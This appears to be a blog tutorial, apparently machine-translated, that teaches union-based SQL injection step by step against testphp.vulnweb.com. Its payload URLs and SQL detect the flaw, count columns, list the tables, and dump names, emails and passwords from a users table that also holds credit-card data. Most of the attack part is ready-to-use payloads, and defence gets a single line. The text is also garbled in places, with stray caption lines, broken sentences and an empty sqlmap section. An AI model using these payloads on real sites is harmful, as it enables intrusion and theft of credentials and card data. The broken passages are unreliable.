Instructions for exploiting basic SQL Injection errors

SQL injection attacks can occur when a web page lets users execute SQL statements right on the Web page or the address bar. In this article, I will demonstrate how to perform a basic SQL Injection attack on a website, and at the end, I will talk about the SQLmap tool, which will automate the entire process.

How to Perform a Basic SQL Injection Attack

The site http://testphp.vulnweb.com/listproducts.php?cat=1 is checking for php vulnerabilities. I will use this site to perform SQLi attack.

How to Perform a Basic SQL Injection Attack

1. Find out if a website is vulnerable to SQL Injection attacks

The most basic and simplest way is to check the URLs of the pages you are visiting. If the URL is of the form http://testphp.vulnweb.com/listproducts.php?cat=1, it is a potential target. To check if the site is actually using SQL, you can add \ or a single quote ” or single quote ‘ at the end of the URL and see if anything in the page changes or you get an SQL error. are not. For most cases, the error will look like this:

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''a\'' at line 1

But the error can also be anything else. For the site http://testphp.vulnweb.com/listproducts.php?cat=1 when I add a ‘ sign at the end, an error will appear:

Instructions for exploiting basic SQL Injection errors 37

So I have concluded that this site is subject to SQL Injection attack http://testphp.vulnweb.com/listproducts.php?cat=1

In the backend, the application might be running a query similar to

SELECT * FROM XYZ_TABLE WHERE CAT='<the value of id>'

The query executed for http://testphp.vulnweb.com/listproducts.php?cat=1′ would be

SELECT * FROM XYZ_TABLE WHERE CAT=1'

And you guessed right. This command will generate an error.

We can modify the query any way we want. If I add --+ at the end the query will run without error. (--+ or # will basically comment anything after it)

2. Find Existing Databases

The next step will be to learn about existing databases. We will use ORDER BY. If I run http://testphp.vulnweb.com/listproducts.php?cat=1 order by 5, the corresponding MySQL query will be

SELECT * FROM XYZ_TABLE WHERE CAT=1 order by 5--+'

This will sort the result based on the 5th column

I will repeat this process with different number of columns until I get the number of columns that the page breaks. For example, in this case when ORDER BY 12, the page will be broken. Now I know that the total number of columns is 11. Since the number of columns is 11, I will run the query select all 1,2,3,4,5,6,7,8,9,10,11.

http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%20all%201,2,3,4,5,6,7,8,9,10,11

The corresponding MySQL query will look like this

SELECT * FROM XYZ_TABLE WHERE CAT=1 union select all 1,2,3,4,5,6,7,8,9,10,11

Now navigate to the website. In some places you will find a number between 1 and 11. I see 7, 2 and 9.

Instructions for exploiting basic SQL Injection errors 38

Now I know that anything I write in position 7, 2 and 9 will be displayed. I want current database, user andversionso I will execute

https://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%20all%201,user(),3,4,5,6,database(),8,version(),10, 11.

Note: %20 is ASCII for space

I replaced 2 with user()7 equals database() and 9 equals version().

I will learn the database, database version and user details.

Instructions for exploiting basic SQL Injection errors 39

I received the following information:

3. Find Table and data in Table in current Database

Once the above information is gathered, everything will be very simple. To get the list of tables, I would run

http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%20all%201,table_name,3,4,5,6,7,8,9,10,11%20from%20information_schema. tables%20where%20table_schema%20=%27acuart%27

The corresponding SQL query:

SELECT * FROM XYZ_TABLE WHERE CAT=1 union select all 1,table_name,3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema="acuart"

information_schema is the default database containing the list of tables. We will use this information to find the table name. acuart is the database name we got from the previous step.

The website will look like this:

Instructions for exploiting basic SQL Injection errors 40

We have a list of Tables tables:

  • artists
  • carts
  • categ
  • featured
  • guestbook
  • pictures
  • products
  • users

4. Discover column names – Column in Table

Explore table columns (column in Table) users

http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%20all%201,column_name,3,4,5,6,7,8,9,10,11%20from%20information_schema. columns where table_name=’users’

The corresponding SQL query:

SELECT * FROM XYZ_TABLE WHERE CAT=1 union select all 1,column_name,3,4,5,6,7,8,9,10,11 from information_schema.columns where table_name="users"

Instructions for exploiting basic SQL Injection errors 41

I get the column names as:

  • uname
  • pass
  • cc
  • address
  • email
  • name
  • phone

5. Find data stored in Table

To view a user’s name, email, and password:

http://testphp.vulnweb.com/listproducts.php?cat=1%20union select all 1,name,3,4,5,6,email,8,pass,10,11 from users

The corresponding SQL query:

SELECT * FROM XYZ_TABLE WHERE CAT=1 union select all 1,name,3,4,5,6,email,8,pass,10,11 from users

Instructions for exploiting basic SQL Injection errors 42

6. Using SQLmap for Automated SQL Injection Attacks

If I want to use sqlmap to do the above, I will have to run the following commands on my terminal

Summary of SQL Injection attack

The SQL Injection attack is one of the most powerful attacks a hacker can perform. There are many ways to prevent SQL Injection, you can refer here.

Leave a Reply